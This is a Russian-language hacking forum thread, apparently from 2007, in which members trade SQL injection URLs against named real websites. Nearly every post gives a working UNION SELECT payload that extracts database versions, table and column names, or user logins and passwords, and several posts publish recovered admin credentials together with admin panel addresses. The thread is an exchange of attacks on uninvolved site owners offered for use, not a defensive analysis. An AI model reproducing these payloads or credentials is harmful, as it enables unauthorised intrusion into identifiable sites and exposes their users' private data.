ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #831  
Старый 10.03.2007, 16:47
Аватар для InferNo23
InferNo23
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
Провел на форуме:
6860213

Репутация: 378
По умолчанию

2KP0t_f!nd
колонки бы хоть подобрал..
http://www.uprava.org/section.php?id=-1+union+select+1,2,3,4,5,6,7/*
http://www.shamray.ru/show.php?id=-1+union+select+user()/* - вывод в титле
 
Ответить с цитированием

  #832  
Старый 10.03.2007, 17:05
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Цитата:
http://www.apahelpcenter.org/articles/topic.php?id=-1+union+select+version()
оффтоп
2 KPOT_f!nd
вот нафиг выкладывать ссылки с кавычками. Составляй запрос, а если не умеешь - читай статьи
хакеры млин
и не надо удалять
 
Ответить с цитированием

  #833  
Старый 10.03.2007, 17:20
Аватар для }{0TT@БЬ)Ч
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885

Репутация: 447
По умолчанию

Цитата:
Сообщение от Spyder  
Код:
http://www.migaweb.de/downloads.php?id=-10+union+select+1,2,3,4,5,6,tAbLe_nAmE,8,9,10+FrOm +InFoRmAtIoN_ScHeMa.tAbLeS+LiMiT+28,2
таблицы :
admin
admin_user
admin_user2
admin_user_allow
admin_intra
admin_intra_acc

Чё то у меня сегодня проблемы с колонками 0о
Цитата:
Сообщение от Spyder  
а если не умеешь - читай статьи
хакеры млин
2Spyder
я бы посоветовал тебе почитать статьи
вот тебе все колонки
Код:
http://www.migaweb.de/downloads.php?id=-10+union+select+null,null,null,null,null,null,null,COLUMN_NAME,null,null+FROM+INFORMATION_SCHEMA.COLUMNS/*
если имелось ввиду те таблицы что ты написал то вот пример одной из них
Код:
http://www.migaweb.de/downloads.php?id=-10+union+select+null,null,null,null,null,null,null,COLUMN_NAME,null,null+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=char(97,100,109,105,110)/*

Последний раз редактировалось }{0TT@БЬ)Ч; 10.03.2007 в 17:32..
 
Ответить с цитированием

  #834  
Старый 10.03.2007, 17:50
Аватар для Colkru
Colkru
Участник форума
Регистрация: 13.01.2007
Сообщений: 160
Провел на форуме:
865816

Репутация: 181
Отправить сообщение для Colkru с помощью ICQ
По умолчанию

PHP код:
http://www.negotiationrussia.ru/index.php?id=-1+union+select+version(),2/* 
Таблицы не подобрал.

PHP код:
http://prazdnik.com.ua/yslyga.php?id=-1+union+select+1,login,pass,4,5,6,7+from+user/* 
логин: Zhuk_vv
пароль: голод
Админка: http://www.prazdnik.com.ua/admin

Последний раз редактировалось Colkru; 10.03.2007 в 17:59..
 
Ответить с цитированием

  #835  
Старый 10.03.2007, 17:59
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

2 }{0TT@БЬ)Ч
спасибо что волнуешься за мои знания, но не стоит
2 Constantine
я не понимаю смысла просто 0о
Цитата:
http://www.joesportsfan.com/mediaspace/?id=-14+union+select+1,2,3,4,convert(concat(username,ch ar(58),password)+using+latin1),6,7,8,9,10,11,12,13 ,14+from+admin+limit+1,1
jmajor:chicken
админка
Цитата:
http://www.joesportsfan.com/admin/
есть возможность заливки картинок
 
Ответить с цитированием

  #836  
Старый 10.03.2007, 18:11
Аватар для Grey
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Код:
http://www.kinovdom.ru/item.php?id=-1+union+select+1,2,3,concat(database(),char(58),user(),char(58),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
Код:
http://www.grandtour.ru/cgi-bin/hotels.cgi?country=%D4%F0%E0%ED%F6%E8%FF&id=-1+union+select+1,2,3,4,version(),user(),database(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*
 
Ответить с цитированием

  #837  
Старый 10.03.2007, 20:06
Аватар для n0ne
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408

Репутация: 861


По умолчанию

Код:
http://www.ixbt.com/news/news.php?id=53979'
Инет глючит, не грузит странички дальше
 
Ответить с цитированием

  #838  
Старый 10.03.2007, 20:10
Аватар для Colkru
Colkru
Участник форума
Регистрация: 13.01.2007
Сообщений: 160
Провел на форуме:
865816

Репутация: 181
Отправить сообщение для Colkru с помощью ICQ
По умолчанию

Цитата:
Сообщение от n0ne  
Код:
http://www.ixbt.com/news/news.php?id=53979'
Инет глючит, не грузит странички дальше

Было это уже...

(http://www.ixbt.com/news/news.php?id=-99+union+select+1,2,0x707265766564203a44,4,5,6,7,8 ,9,10,11/*)
 
Ответить с цитированием

  #839  
Старый 10.03.2007, 20:19
Аватар для n0ne
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408

Репутация: 861


По умолчанию

Ну извиняйте тогда

Код:
http://www.security-outlet.com/infopages/extended.php?id=-229+UNION+SELECT+1,2,3,4,5,6,7,database(),9,10,11,12,13,14,15,16,17/*
 
Ответить с цитированием

  #840  
Старый 10.03.2007, 20:21
Аватар для n1†R0x
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

Код:
http://www.ayda.ru/hotels/show_country.php?id=-1+union+select+1,2,concat(login,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15+from+users/*
чистые login:рass

//upd:
Код:
http://www.proaudio.ru/product.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users/*
в общем, столбик с паролем называется pin или что-то вроде того, не могу подобрать.. user-поля нет.

Последний раз редактировалось n1†R0x; 10.03.2007 в 20:50..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ